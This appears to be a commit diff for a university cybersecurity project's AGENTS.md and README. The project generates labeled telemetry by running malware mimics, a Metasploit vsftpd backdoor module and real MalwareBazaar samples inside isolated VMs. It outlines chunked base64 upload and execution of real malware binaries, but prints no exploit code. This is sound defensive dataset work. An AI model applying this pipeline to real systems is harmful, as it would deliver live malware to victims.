Merge origin/main into Dev_REL1_043026; accept main's service files
Cherry-picks all upstream additions (fleet runner, full collector suite, shipper module, exploit driver, samples, scripts/, cis490_doctor, etc.) and resolves the two service-file conflicts by accepting main's production versions over the stubs we wrote on Day 1.

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
commit
7683b64929
71 changed files with 10477 additions and 214 deletions
202
AGENTS.md
Normal file
@ -0,0 +1,202 @@
# AGENTS.md — guidance for AI agents working on this repo

This project is part of the spectral lab (`http://maxgit.wg/spectral/`).
The conventions below also apply to sibling repos (`wg-enroll`,
`wg-pki`, `caddy`, `iptmonads`, `matrix`, `forgejo`, `vault`,
`openclaw-deploy`).

---

## How a lab host gets to "shipping data" — the canonical bring-up

If you (an AI agent OR a human) are looking at a fresh lab host and
asking "is this thing actually generating data for the central
collector?", run this in order. **Cloning the repo by itself does
nothing. Running launchers from a manual clone bypasses the
systemd services that do the actual work.**

```sh
# 0. (One-time, on the Pi only.) Initialize the CIS490 client CA + a
#    leaf cert for THIS lab host. Get its WG IP from `wg-enroll-admin
#    show <usb>` first.
sudo /home/max/.env/wg-pki/scripts/init-cis490-client-ca.sh   # idempotent
sudo /home/max/.env/wg-pki/scripts/deploy-cis490-cert.sh \
    <host_id> <wg_ip>   # mints + scp's + extracts + chmods

# 1. (On the lab host.) Install the lab-host role. This copies the
#    repo into /opt/cis490, builds the venv, drops systemd units,
#    fetches the Alpine baseline qcow2, and builds the cidata ISO
#    with the in-guest agent embedded.
sudo /opt/cis490/scripts/install-lab-host.sh
# (or, if running from the manual clone:)
#   sudo ./scripts/install-lab-host.sh

# 2. Edit /etc/cis490/lab-host.toml: set host_id and any overrides.

# 3. Verify everything before enabling the timer-driven services:
/opt/cis490/.venv/bin/python /opt/cis490/tools/cis490_doctor.py \
    --role lab-host
# → green/yellow rows mean READY; red rows print the exact fix
#   command. Re-run until clean.

# 4. Turn on the services. From this moment on, the orchestrator runs
#    one fleet wave on each Restart= cycle, and the shipper picks up
#    completed episodes and PUTs them to https://collector.wg over mTLS.
sudo systemctl enable --now cis490-shipper cis490-orchestrator

# 5. (On the Pi.) Watch the index grow:
sudo tail -f /var/lib/cis490/index.jsonl

# 6. (Optional, Tier 3.) Enable real exploit fire (needs metasploit).
sudo /opt/cis490/scripts/install-msfrpcd.sh
# Operator-supplied URL + sha256 (Rapid7 download is registration-walled).
# All three variables go after `sudo`, which resets the caller's
# environment by default:
sudo IMAGE_URL='…' IMAGE_SHA256='…' OUT_DIR=/var/lib/cis490/vm/images \
    /opt/cis490/scripts/fetch-metasploitable2.sh
```

If `index.jsonl` doesn't grow within a wave-interval (~60 s after
`systemctl enable --now`), run `cis490-doctor` again. The most
common silent failures it catches:

- `*.wg` DNS missing (wg-enroll provisions it; manual workaround is
  one line in `/etc/hosts`)
- mTLS cert chain not installed under `/etc/cis490/certs/`
- `cis490-shipper` service inactive (forgot step 4)
- `qemu-system-x86_64` not on PATH

`cis490-doctor --json` is machine-readable for use by other agents.

## How an agent generates data on demand (without waiting for the timer)

```sh
# One labeled episode (90 s) with a chosen sample profile:
sudo -u cis490 /opt/cis490/.venv/bin/python \
    /opt/cis490/tools/run_real_vm_demo.py \
    --data-root /var/lib/cis490/data \
    --sample mirai-class-bot

# Force the shipper to run one pass:
sudo systemctl start cis490-shipper.service   # (if disabled)
# or:
sudo -u cis490 /opt/cis490/.venv/bin/python -m shipper \
    --config /etc/cis490/lab-host.toml --once

# Confirm on the Pi:
ssh <pi> 'sudo tail -3 /var/lib/cis490/index.jsonl'
```

Any tool that wants to *count* what's been shipped:

```sh
ssh <pi> 'sudo /opt/cis490/.venv/bin/python /opt/cis490/tools/index_reader.py \
    --index /var/lib/cis490/index.jsonl --count-by host_id'
```
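
For an agent that already has a copy of the index and cannot call `index_reader.py`, the same count can be approximated in a few lines. This is a minimal sketch, assuming each line of `index.jsonl` is one JSON object carrying a `host_id` field (the `--count-by host_id` flag suggests this, but the schema is not shown here). `count_by` is a hypothetical helper, not part of the repo.

```python
import json
from collections import Counter
from typing import Iterable


def count_by(lines: Iterable[str], field: str = "host_id") -> Counter:
    """Count index rows per value of `field`, skipping blank or malformed lines."""
    counts: Counter = Counter()
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            row = json.loads(line)
        except json.JSONDecodeError:
            # A half-written final line is plausible while the index is growing.
            continue
        if isinstance(row, dict):
            # Rows without the field are counted under a visible placeholder.
            counts[str(row.get(field, "<missing>"))] += 1
    return counts
```

Passing an open file handle works as well as a list of strings, since the function only iterates over lines.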

## Quick test for "is the pipe alive at all"

The `--ping` mode of the shipper does an authenticated POST to
`/v1/ping` and writes nothing to the database. Use it as the
smallest E2E test:

```sh
sudo -u cis490 /opt/cis490/.venv/bin/python -m shipper \
    --config /etc/cis490/lab-host.toml --ping
# {"ok": true, "status_code": 200, ...} on success.
# Any other status is the operator's signal to read the error string.
```
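
An agent that runs the ping as a subprocess needs to turn its output into a yes/no answer. The sketch below assumes the shipper prints a single JSON object on stdout with at least the `ok` and `status_code` keys shown in the comment above. The `error` key and the `ping_ok` helper are guesses made for illustration.

```python
import json


def ping_ok(stdout_text: str) -> tuple[bool, str]:
    """Return (alive, reason) from the text printed by the shipper's --ping mode."""
    try:
        result = json.loads(stdout_text)
    except json.JSONDecodeError as exc:
        return False, f"unparseable ping output: {exc}"
    if not isinstance(result, dict):
        return False, "ping output is not a JSON object"
    if result.get("ok") is True and result.get("status_code") == 200:
        return True, "pipe is alive"
    # "error" is an assumed key name; fall back to the whole payload if absent.
    return False, str(result.get("error", result))
```

Treating anything other than `ok: true` with status 200 as a failure matches the guidance above that any other status should send the operator to the error string.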

---

## File an issue when you hit a problem

**When you run into an issue you cannot fully resolve in the current
turn, file it as a Forgejo issue on the relevant repo before moving
on.** Do not silently log a TODO comment, leave a partial workaround,
or assume someone else will remember. The issue tracker is the
durable record.

This applies to:

- a build / test / typecheck failure you can't fix in scope
- a bug you discover but aren't tasked with fixing
- a missing dep, missing config, or env-only failure that blocks E2E
- a design gap you've worked around but want a follow-up to fix
  properly
- a scope-out you made (e.g. "deferred Tier 4 sample fetch") that
  needs an owner so it doesn't get lost

Don't file an issue when:

- the user is in the conversation and you can just *tell* them
- it's already filed (search first: `GET /api/v1/repos/<owner>/<repo>/issues?state=open&q=<keyword>`)
- it's truly a non-issue (a one-line edit you're about to make this
  same turn)

## How to file (Forgejo API)

The local Forgejo at `http://10.100.0.1:3000` accepts API calls with a
token-bearer header:

```sh
curl -s -X POST \
    -H "Authorization: token <TOKEN>" \
    -H "Content-Type: application/json" \
    http://10.100.0.1:3000/api/v1/repos/spectral/<repo>/issues \
    -d '{
      "title": "<short, action-oriented title>",
      "body": "<context, repro, attempted fixes, suggested next step>"
    }'
```

The token comes from the user's session — never embed one in code or
commits.
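
For agents that work in Python, the search-first and create calls above can be sketched with the standard library only. The base URL, endpoints, and header format are taken from this section. The function names are hypothetical, and the token is always passed in by the caller so that nothing is embedded in code.

```python
import json
import urllib.parse
import urllib.request

FORGEJO = "http://10.100.0.1:3000"  # base URL quoted in the section above


def search_request(owner: str, repo: str, keyword: str, token: str) -> urllib.request.Request:
    """Build the 'search first' GET for open issues matching a keyword."""
    query = urllib.parse.urlencode({"state": "open", "q": keyword})
    url = f"{FORGEJO}/api/v1/repos/{owner}/{repo}/issues?{query}"
    return urllib.request.Request(url, headers={"Authorization": f"token {token}"})


def create_request(owner: str, repo: str, title: str, body: str, token: str) -> urllib.request.Request:
    """Build the POST that files a new issue."""
    payload = json.dumps({"title": title, "body": body}).encode("utf-8")
    return urllib.request.Request(
        f"{FORGEJO}/api/v1/repos/{owner}/{repo}/issues",
        data=payload,
        method="POST",
        headers={"Authorization": f"token {token}", "Content-Type": "application/json"},
    )


def file_issue_once(owner: str, repo: str, keyword: str, title: str, body: str, token: str):
    """File the issue only if the keyword search finds no open match."""
    with urllib.request.urlopen(search_request(owner, repo, keyword, token)) as resp:
        if json.load(resp):
            return None  # something similar is already open
    with urllib.request.urlopen(create_request(owner, repo, title, body, token)) as resp:
        return json.load(resp)
```

Splitting request construction from sending keeps the builders testable without network access. Only `file_issue_once` talks to the server.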

### What a good issue body contains

1. **Context** — one sentence on what was being attempted.
2. **What happened** — the actual error, log line, or unexpected
   behavior. Paste exact output.
3. **What was tried** — every workaround you attempted and why it
   didn't stick.
4. **Suggested next step** — the smallest change that would resolve
   it, if you have a guess. "Unknown" is a fine answer.
5. **Related** — link the commit / PR / file:line where the issue
   surfaced.

### What a good title looks like

| Bad | Good |
|---|---|
| `tests broken` | `tests/test_episode.py: race when t_mono_origin_ns is set in run() not __init__` |
| `caddy thing` | `Caddy: client_auth requires absolute path; relative trusted_ca_cert_file silently fails` |
| `fix later` | `shipper: 5xx backoff cap is 5min, doc says 1min — pick one` |

## After filing

- Reference the issue number in the next commit message:
  `Refs spectral/<repo>#<n>` or `Closes spectral/<repo>#<n>` if your
  current change actually fixes it.
- If the issue is on a different repo than the one you're committing
  to, fully qualify: `spectral/wg-pki#3`.

## Other conventions

- **Don't put off the hard parts.** Frame "deferred-with-reason" only
  for genuine blockers (binary not present on this machine, external
  service unreachable). For anything you *could* do but find awkward
  — bridge setup, cross-arch quirks, fleet concurrency — do it. The
  user has flagged this twice when work was scoped down prematurely.
  When something genuinely is blocked by an operator artifact, file
  the Forgejo issue and *automate the bring-up* (e.g., installer
  script + sha256-verifying fetcher) so the moment the artifact lands
  it Just Works.
- **Naming:** never coin USB / device / service names on the user's
  behalf. Ask first. Reusing an old name is especially bad.
- **`/etc` configs:** `Read` first, copy second. Never overwrite a
  `/etc/...` file from a template without checking what's actually
  there.
- **wg-enroll scope:** creation-only. Don't add admin /
  service-activation features to it.
- **Don't expand a project's binary name beyond its own boundary:**
  `openclaw` is the queue/permissions binary in `openclaw-deploy`.
  This repo is `wg-enroll` (or its caller). Don't conflate.
307
README.md
|
|
@ -4,9 +4,16 @@ Course project for CIS490 (Cybersecurity). The end-goal is an ML model that
|
|||
watches performance metrics on a real device, decides whether the device has
|
||||
been breached, and triggers a hardware-level reset when confidence is high
|
||||
enough. This repository covers the **dataset side** — we run public malware
|
||||
samples against intentionally vulnerable Linux VMs and capture labeled
|
||||
time-series telemetry that mirrors what the deployed model would see in the
|
||||
field.
|
||||
samples (and behavior-matched mimics) against intentionally vulnerable Linux
|
||||
VMs and capture labeled time-series telemetry that mirrors what the deployed
|
||||
model would see in the field.
|
||||
|
||||
Concretely, every lab host on the WireGuard mesh detects how much capacity
|
||||
it has, spins up that many concurrent VMs, gives each VM a *different*
|
||||
malware profile from the manifest, and ships the resulting labeled episode
|
||||
tarballs to the central receiver on the Pi over mTLS. Running the same
|
||||
fleet on multiple hosts gives novel, non-overlapping data per host with no
|
||||
coordinator — see [Multi-host fleet](#multi-host-fleet) below.
|
||||
|
||||
The work is grounded in the trust-over-time scoring model from
|
||||
[IEEE 9881803](https://ieeexplore.ieee.org/document/9881803).
|
||||
|
|
@ -22,15 +29,33 @@ the set of timestamped phase transitions written to `labels.jsonl` —
|
|||
sharing a monotonic clock with the metric rows so anything aligned in
|
||||
time can be aligned in code.
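
Because labels and metric rows share one monotonic clock, attaching a phase to every telemetry row is a sorted lookup. The sketch below assumes both files carry a nanosecond timestamp under a key called `t_mono_ns` and that label rows name the phase under `phase`. Both key names are placeholders, so check them against the real `labels.jsonl` schema before use.

```python
from bisect import bisect_right


def label_rows(labels, rows, ts_key="t_mono_ns", phase_key="phase"):
    """Attach to each telemetry row the phase that was active at its timestamp.

    `labels` must be sorted by timestamp. Rows that precede the first
    label get a phase of None.
    """
    starts = [lab[ts_key] for lab in labels]
    out = []
    for row in rows:
        # Index of the last label whose start time is <= the row's time.
        i = bisect_right(starts, row[ts_key]) - 1
        phase = labels[i][phase_key] if i >= 0 else None
        out.append({**row, phase_key: phase})
    return out
```

A row stamped exactly at a transition is assigned to the new phase, which follows from using `bisect_right`.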
|
||||
|
||||
### Tier 2 — *real Alpine VM, real workload driven from inside the guest*
|
||||
### Tier 2 — *real Alpine VM, profile-driven workload inside the guest*
|
||||
|
||||
This is the closest we get to real-malware behaviour without yet running
|
||||
real malware. Telemetry is real `/proc/<qemu_pid>` from outside the
|
||||
guest, **and the load is generated inside the guest** by busybox
|
||||
``yes`` (CPU saturation) and ``dd`` (disk bursts), driven over the
|
||||
serial console by `tools/vm_load_controller.py`. Every phase transition
|
||||
in `labels.jsonl` corresponds to an actual command issued inside the
|
||||
real VM.
|
||||
guest plus three more sources running concurrently (QMP, bridge pcap,
|
||||
in-guest agent — see *Telemetry sources* below). The *load* itself is
|
||||
generated inside the guest by a profile-matched shell command from
|
||||
[`exploits/workloads.py`](exploits/workloads.py), driven over the
|
||||
serial console by [`tools/vm_load_controller.py`](tools/vm_load_controller.py).
|
||||
|
||||
Each sample's `profile` (from [`samples/manifest.toml`](samples/manifest.toml))
|
||||
dispatches to a different in-session workload, so the envelope each
|
||||
VM produces is observably different per family — exactly the variance
|
||||
the ML model needs to learn:
|
||||
|
||||
| profile          | shape                                                    |
|------------------|----------------------------------------------------------|
| `cpu-saturate`   | sustained 1-vCPU saturation (XMRig)                      |
| `scan-and-dial`  | SYN-style probes across the bridge subnet + dial-home    |
| `io-walk`        | fs traversal + 4 KiB urandom writes (ransomware)         |
| `bursty-c2`      | long idle + periodic 3-packet egress burst (Dridex)      |
| `low-and-slow`   | minimal CPU + periodic memory churn (Kovter / fileless)  |
| `shell-resident` | one long-lived TCP socket + periodic command ticks (RAT) |
|
||||
|
||||
Every phase transition in `labels.jsonl` corresponds to an actual
|
||||
command issued inside the real VM, and `meta.json` records which
|
||||
sample / profile / kind drove it.
|
||||
|
||||

|
||||
|
||||
|
|
@ -41,10 +66,20 @@ controller killing the load process inside the VM. The
|
|||
infected_running → dormant → infected_running re-entry is the textbook
|
||||
envelope that justifies the whole project framing.
|
||||
|
||||
Reproduce with:
|
||||
Reproduce one episode (profile-driven via `--sample` or `SAMPLE_NAME`
|
||||
env, defaults to the v1 yes-loop without one):
|
||||
|
||||
```sh
|
||||
uv run python tools/run_real_vm_demo.py --data-root data
|
||||
uv run python tools/run_real_vm_demo.py --data-root data \
|
||||
--sample xmrig-cryptominer
|
||||
```
|
||||
|
||||
Or run the **fleet** — one wave of `max_concurrent` parallel episodes,
|
||||
each slot pulling a different sample from the manifest:
|
||||
|
||||
```sh
|
||||
uv run python tools/run_fleet.py --capacity # see what the host can do
|
||||
uv run python tools/run_fleet.py --waves 1 --data-root data
|
||||
```
|
||||
|
||||
### Tier 1 — *real Alpine VM, idle baseline*
|
||||
|
|
@ -67,14 +102,68 @@ above produces from real KVM behaviour.
|
|||
|
||||

|
||||
|
||||
### What's still missing for the real-malware envelope
|
||||
### Tier 3 — *real exploit fire, profile-matched workload (Driver v2)*
|
||||
|
||||
The Tier-3 driver lives in [`exploits/`](exploits/README.md) — a tiny
|
||||
msgpack-over-HTTPS msfrpc client + `MSFExploitDriver`. With a
|
||||
[`Sample`](samples/manifest.py) supplied, the driver dispatches the
|
||||
post-exploit `infected_running` workload through
|
||||
[`exploits/workloads.py`](exploits/workloads.py) — same six profiles
|
||||
as Tier 2, so a fleet wave produces matched envelopes whether or not
|
||||
an exploit fires. Without a sample, the v1 yes-loop path is preserved
|
||||
for smoke runs.
|
||||
|
||||
First canned module: `exploits/modules/vsftpd_234_backdoor.toml`
|
||||
(Metasploitable2's CVE-2011-2523). [`scripts/install-msfrpcd.sh`](scripts/install-msfrpcd.sh)
|
||||
sets up `msfrpcd` (loopback only) as a hardened systemd unit;
|
||||
[`scripts/fetch-metasploitable2.sh`](scripts/fetch-metasploitable2.sh)
|
||||
pulls + sha256-verifies a target image from operator-supplied URL.
|
||||
|
||||
### Tier 4 — *real malware sample, fetched + uploaded + executed*
|
||||
|
||||
A manifest entry with a `sha256` flips its `Sample.kind` to `"real"`.
|
||||
The driver then bypasses the mimic profile and runs the real-binary
|
||||
path:
|
||||
|
||||
1. [`tools/fetch_sample.py <sha256>`](tools/fetch_sample.py) pulls the
   binary from MalwareBazaar (Auth-Key from
   `samples/.bazaar.token` or `MALWAREBAZAAR_API_KEY`), unzips with the
   standard `infected` password, sha-verifies, and lands at
   `samples/store/<sha256>` (gitignored).
2. At `infected_running`, the driver chunked-uploads the binary into
   the shell session as 8 KiB base64 segments
   (`exploits.workloads.chunked_real_binary_upload`). 256 KiB binaries
   work without buffer-busting msfrpc.
3. The session decodes, sha-verifies *again on the guest side*, chmods,
   and execs only if the hash matches. Mismatch fail-stops the run.
4. `meta.sample.sha256` + per-step events
   (`real_binary_upload_begin`, `real_binary_verify`,
   `sample_executed{kind=real}`) record exactly which binary was run
   and when, so trainers can join cleanly.
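
The chunk, reassemble, and verify-before-exec flow in steps 2 and 3 can be illustrated without a VM. This is a sketch of the idea only, not the code in `exploits/workloads.py`. It assumes "8 KiB" means 8 KiB of raw bytes per segment before base64 encoding, and the function names are hypothetical.

```python
import base64
import hashlib

CHUNK_BYTES = 8 * 1024  # assumption: 8 KiB of raw bytes per segment


def to_segments(blob: bytes, chunk_bytes: int = CHUNK_BYTES) -> list[str]:
    """Split a binary into base64 text segments small enough for a shell session."""
    return [
        base64.b64encode(blob[i : i + chunk_bytes]).decode("ascii")
        for i in range(0, len(blob), chunk_bytes)
    ]


def reassemble_and_verify(segments: list[str], expected_sha256: str) -> bytes:
    """Decode segments in order and fail-stop if the hash does not match."""
    blob = b"".join(base64.b64decode(seg) for seg in segments)
    actual = hashlib.sha256(blob).hexdigest()
    if actual != expected_sha256.lower():
        raise ValueError(f"sha256 mismatch: expected {expected_sha256}, got {actual}")
    return blob
```

Encoding each segment on its own means the receiving side can decode and append segment by segment, and a single corrupted segment still surfaces as a hash mismatch at the end.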
|
||||
|
||||
### Tier maturity
|
||||
|
||||
| Tier | What it gives | Status |
|
||||
|---|---|---|
|
||||
| 1 — real VM, idle | confidence the collector reads real KVM behaviour | ✅ done |
|
||||
| 2 — real VM, real workload from inside the guest | first real-load envelope shape | ✅ done |
|
||||
| 3 — real VM, real exploit fire (Metasploitable + msfrpc) | honest `armed → infecting` transitions | 🚧 |
|
||||
| 4 — real VM, real malware sample (XMRig from MalwareBazaar) | the full envelope we ultimately train on | 🚧 |
|
||||
| 1 — real VM, idle | confidence the collectors read real KVM behaviour | ✅ done |
|
||||
| 2 — real VM, profile-driven workload | distinguishable in-guest envelopes per malware family | ✅ done |
|
||||
| 3 — real VM, real exploit fire + profile workload | honest `armed → infecting` transitions, driver v2 dispatch | ✅ code; ⏳ awaiting Metasploitable2 image + msfrpcd on a lab host |
|
||||
| 4 — real VM, real malware sample (MalwareBazaar fetch) | the full envelope we ultimately train on | ✅ code; ⏳ awaiting MalwareBazaar API key + sha256s in manifest |
|
||||
|
||||
### Telemetry sources (all five wire into one episode dir)
|
||||
|
||||
| # | Source                         | Vantage      | Role                 |
|---|--------------------------------|--------------|----------------------|
| 1 | host `/proc/<qemu_pid>`        | outside      | oracle (label only)  |
| 2 | QEMU QMP queries               | outside      | oracle (label only)  |
| 3 | `perf stat -p <qemu_pid>`      | outside      | oracle (label only)  |
| 4 | Bridge pcap → 100 ms netflow   | gateway-side | feature (deployable) |
| 5 | In-guest agent (virtio-serial) | inside       | feature (deployable) |
|
||||
|
||||
All five are live. The deploy/oracle split follows
|
||||
[`docs/threat-model.md`](docs/threat-model.md): only sources 4 + 5
|
||||
are usable as model *features* in the field — sources 1, 2, 3 exist
|
||||
as labeling oracles only.
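
Source 4 in the table turns raw packets into 100 ms netflow rows. The aggregation step can be sketched as follows, assuming packets have already been parsed into `(timestamp_ns, length_bytes)` pairs. The output keys `t_bucket_ns`, `packets`, and `bytes` are illustrative and may differ from the real `netflow.jsonl` schema.

```python
from collections import defaultdict

BUCKET_NS = 100_000_000  # 100 ms expressed in nanoseconds


def bucketize(packets, bucket_ns=BUCKET_NS):
    """Aggregate (t_ns, length_bytes) pairs into fixed-width time buckets."""
    agg = defaultdict(lambda: {"packets": 0, "bytes": 0})
    for t_ns, length in packets:
        # Floor each timestamp to the start of its bucket.
        start = (t_ns // bucket_ns) * bucket_ns
        agg[start]["packets"] += 1
        agg[start]["bytes"] += length
    # Emit rows in time order; empty buckets are simply absent.
    return [{"t_bucket_ns": start, **agg[start]} for start in sorted(agg)]
```

Leaving empty buckets out keeps idle periods compact. A consumer that needs a dense series can fill the gaps with zeros.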
|
||||
|
||||
For an interactive view of any episode (zoom/pan/hover), run:
|
||||
|
||||
|
|
@ -85,83 +174,135 @@ tools/show_envelope.sh data/episodes/<episode_id>
|
|||
|
||||
---
|
||||
|
||||
## Status
|
||||
## Status (106/106 tests passing as of `a88ac83`)
|
||||
|
||||
- ✅ Receiver (HTTPS PUT, sha256-verified, idempotent) — tested with httpx + curl
|
||||
- ✅ Orchestrator v0 — single- and scheduled-phase modes, ULID episode ids
|
||||
- ✅ Host /proc oracle collector (source 1 of 5) at 10 Hz
|
||||
- ✅ Synthetic envelope demo — full 8-phase envelope produced end-to-end
|
||||
- ✅ Real VM (Alpine 3.21 cloud-init under KVM) — orchestrator collects against the real `qemu-system` pid
|
||||
- ✅ **Tier 2 — real VM, real workload:** serial-console-driven load controller fires `yes`/`dd` inside the guest at every phase transition
|
||||
- 🚧 QMP collector (source 2), bridge pcap collector (source 4), in-guest agent (source 5)
|
||||
- 🚧 Exploit driver (Metasploit RPC) for `armed → infecting` transitions on `session_open`
|
||||
- 🚧 Shipper (the third leg of the WG pipeline — receiver and orchestrator already verified)
|
||||
**Pipeline (lab-host → Pi → tarball stored)**
|
||||
- ✅ Receiver app (HTTPS PUT, sha256-verified, idempotent) — running on the Pi behind Caddy with mTLS via the wg-pki client CA
|
||||
- ✅ `POST /v1/ping` smoke endpoint (writes nothing, exercises the full auth path)
|
||||
- ✅ Shipper (`shipper/`) — tar+zstd, retry/backoff, `--ping` mode
|
||||
- ✅ Caddy `collector.wg` block (in `spectral/caddy`)
|
||||
- ✅ Lab-host install script + systemd units (`scripts/install-lab-host.sh`, `etc/cis490-{shipper,orchestrator}.service`)
|
||||
- ✅ Receiver install script (`scripts/install-receiver.sh`)
|
||||
- ✅ wg-pki client-CA bootstrap + per-host leaf issuance (in `spectral/wg-pki`)
|
||||
|
||||
> **Topology note:** in this project the **Pi5 is the WireGuard-side
|
||||
> *collector*** that receives episode tarballs from one or more lab hosts.
|
||||
> It is *not* the deployment target for the model. The deployment target is
|
||||
> generic ("any constrained Linux device"). See
|
||||
**Telemetry**
|
||||
- ✅ Source 1 — host `/proc/<qemu_pid>` @ 10 Hz
|
||||
- ✅ Source 2 — QEMU QMP @ 1 Hz
|
||||
- ✅ Source 3 — `perf stat -p <qemu_pid>` (opt-in via `enable_perf`; needs `CAP_SYS_ADMIN` / `CAP_PERFMON`)
|
||||
- ✅ Source 4 — bridge pcap + 100 ms netflow bucketizer (pure-Python parser, no scapy/dpkt dep), wired into `EpisodeRunner` via `bridge_iface`
|
||||
- ✅ Source 5 — in-guest agent over virtio-serial; cidata-embedded for first-boot install on Alpine
|
||||
|
||||
**Orchestrator + drivers**
|
||||
- ✅ Orchestrator v0 — phase-scheduled episode runner, ULID episode ids
|
||||
- ✅ Snapshot/revert via QMP `loadvm` (`revert_at_start` / `revert_at_end`) for clean baselines between episodes
|
||||
- ✅ Tier 2 driver — real Alpine VM, profile-driven in-guest workload over serial console
|
||||
- ✅ Tier 3 driver v2 — `MSFExploitDriver` + msfrpc client + per-sample workload dispatch; first canned module `vsftpd_234_backdoor.toml`
|
||||
- ✅ Tier 4 — `tools/fetch_sample.py` (MalwareBazaar by sha256) + chunked real-binary upload (`exploits.workloads.chunked_real_binary_upload`) + guest-side sha-verify-then-exec dispatch in `MSFExploitDriver`
|
||||
- ⏳ Tier 3 integration — needs operator to drop a Metasploitable2 image + run `scripts/install-msfrpcd.sh` on a lab host
|
||||
- ⏳ Tier 4 integration — needs operator's MalwareBazaar API key + at least one `sha256` entry in `samples/manifest.toml`
|
||||
|
||||
**Fleet (multi-VM, multi-host data generation)**
|
||||
- ✅ Resource-aware capacity detector (cores / RAM / load) — `orchestrator/fleet.py`
|
||||
- ✅ Concurrent slot runner — `tools/run_fleet.py`
|
||||
- ✅ Sample manifest with six behavioural profiles + deterministic per-(host_id, slot, episode) selection so every host walks the catalog in a different order
|
||||
|
||||
> **Topology note:** the **Pi5 is the WireGuard-side *collector*** that
|
||||
> receives episode tarballs from one or more lab hosts. It is *not* the
|
||||
> deployment target for the model. The deployment target is generic
|
||||
> ("any constrained Linux device"). See
|
||||
> [`docs/architecture.md`](docs/architecture.md).
|
||||
|
||||
---
|
||||
|
||||
<details>
|
||||
<summary><b>Quick start — run the synthetic envelope demo (~90 s)</b></summary>
|
||||
<summary><b>Quick start — fleet mode (the primary workflow)</b></summary>
|
||||
|
||||
```sh
|
||||
git clone https://maxgit.wg/spectral/CIS490.git
|
||||
cd CIS490
|
||||
|
||||
# One-time setup.
|
||||
uv sync
|
||||
|
||||
# Generate one labeled episode (8 phases, 851 telemetry rows, 85 s).
|
||||
uv run python tools/run_envelope_demo.py --data-root data
|
||||
# 1. Build the cidata ISO with the in-guest agent baked in.
|
||||
uv run python tools/build_cidata.py vm/images/cidata.iso
|
||||
|
||||
# Render a static PNG envelope of that episode.
|
||||
uv run python tools/plot_envelope.py data/episodes/<episode_id>
|
||||
# 2. See what this host is sized for.
|
||||
uv run python tools/run_fleet.py --capacity
|
||||
# cores: 4 (reserve 1)
|
||||
# ram: 7951 MiB total, 5223 MiB available (headroom 1024 MiB, per-vm 320 MiB)
|
||||
# load: 1m=0.51
|
||||
# caps: by_cores=3, by_ram=13, by_load=3
|
||||
# --> max_concurrent VMs: 3
|
||||
|
||||
# Or open an interactive plot in your browser:
|
||||
# 3. Run one wave (= max_concurrent parallel episodes, each with a
|
||||
# different sample profile).
|
||||
uv run python tools/run_fleet.py --waves 1 --data-root data
|
||||
|
||||
# 4. Plot any episode (matplotlib WebAgg).
|
||||
tools/show_envelope.sh data/episodes/<episode_id>
|
||||
```
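
The `--capacity` output shown in the fleet quick start can be reproduced with simple arithmetic. The formulas below are inferred from that sample output and are not taken from `orchestrator/fleet.py`. The load rule in particular is a guess that happens to match the one data point shown.

```python
import math


def max_concurrent(cores, reserve_cores, ram_available_mib, headroom_mib, per_vm_mib, load_1m):
    """Estimate how many VMs fit, as the minimum of three independent caps."""
    by_cores = max(cores - reserve_cores, 0)
    by_ram = max((ram_available_mib - headroom_mib) // per_vm_mib, 0)
    # Guessed rule: cores not already consumed by the 1-minute load average.
    by_load = max(math.floor(cores - load_1m), 0)
    return {
        "by_cores": by_cores,
        "by_ram": by_ram,
        "by_load": by_load,
        "max_concurrent": min(by_cores, by_ram, by_load),
    }
```

With the sample figures (4 cores, 1 reserved, 5223 MiB available, 1024 MiB headroom, 320 MiB per VM, load 0.51) this returns caps of 3, 13, and 3, so the tightest constraint allows 3 VMs.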
|
||||
|
||||
The data lands in `data/episodes/<ulid>/`:
|
||||
Each episode dir contains:
|
||||
|
||||
```
|
||||
meta.json episode metadata (image, snapshot, schedule, host fingerprint)
|
||||
events.jsonl orchestrator actions (snapshot_load, phase_transition, episode_end)
|
||||
meta.json episode metadata (image, sample, profile, fleet capacity)
|
||||
events.jsonl orchestrator + driver events (exploit_fire, session_open, sample_executed, ...)
|
||||
labels.jsonl one row per phase transition — THIS is the envelope
|
||||
telemetry-proc.jsonl host /proc sampler at 10 Hz
|
||||
telemetry-proc.jsonl source 1: host /proc sampler @ 10 Hz
|
||||
telemetry-qmp.jsonl source 2: QMP query-status / blockstats / kvm stats @ 1 Hz
|
||||
telemetry-guest.jsonl source 5: in-guest agent (CPU jiffies, mem, listen ports, top procs)
|
||||
network.pcap source 4: tcpdump on br-malware
|
||||
netflow.jsonl source 4: 100 ms-bucketed pcap aggregation
|
||||
done.marker written last; the shipper only sees finished episodes
|
||||
```
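
Since `done.marker` is written last, a consumer can treat its presence as the signal that an episode directory is complete. The sketch below shows that check under the directory layout listed above. `finished_episodes` is a hypothetical helper, not the shipper's actual scan.

```python
from pathlib import Path


def finished_episodes(data_root):
    """Return episode directories that contain done.marker, sorted by name."""
    episodes = Path(data_root) / "episodes"
    if not episodes.is_dir():
        return []
    return sorted(
        p for p in episodes.iterdir()
        if p.is_dir() and (p / "done.marker").is_file()
    )
```

Episode ids are ULIDs, which sort lexicographically by creation time, so sorting by name yields oldest-first order.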
|
||||
|
||||
</details>
|
||||
|
||||
<details>
|
||||
<summary><b>Quick start — boot a real Linux VM (Cirros)</b></summary>
|
||||
|
||||
The phase-2 launcher boots a Cirros qcow2 under KVM and exposes its
|
||||
QMP/monitor sockets and pidfile. The orchestrator then samples the real
|
||||
`qemu-system` process.
|
||||
<summary><b>Quick start — single episode, no fleet</b></summary>
|
||||
|
||||
```sh
|
||||
# Pre-staged: vm/images/cirros-baseline.qcow2 with snapshot 'baseline-v1'.
|
||||
# (See docs/sources.md for the Cirros sha256.)
|
||||
# Tier 2 (no exploit, profile-driven workload):
|
||||
uv run python tools/run_real_vm_demo.py --data-root data \
|
||||
--sample mirai-class-bot
|
||||
|
||||
# Boot in one terminal:
|
||||
RUN_DIR=/tmp/cis490-vm vm/launch_demo.sh
|
||||
|
||||
# In another terminal, point the orchestrator at the VM's pid:
|
||||
QPID=$(cat /tmp/cis490-vm/qemu.pid)
|
||||
uv run python -m orchestrator --target-pid $QPID --duration 20
|
||||
|
||||
# Plot:
|
||||
tools/show_envelope.sh data/episodes/<episode_id>
|
||||
# Tier 3 (real exploit fire via msfrpcd):
|
||||
MSFRPC_PASSWORD=$(. /etc/cis490/msfrpc.env; echo $MSFRPC_PASSWORD) \
|
||||
uv run python tools/run_tier3_demo.py \
|
||||
--module vsftpd_234_backdoor \
|
||||
--sample ransomware-mimic \
|
||||
--data-root data
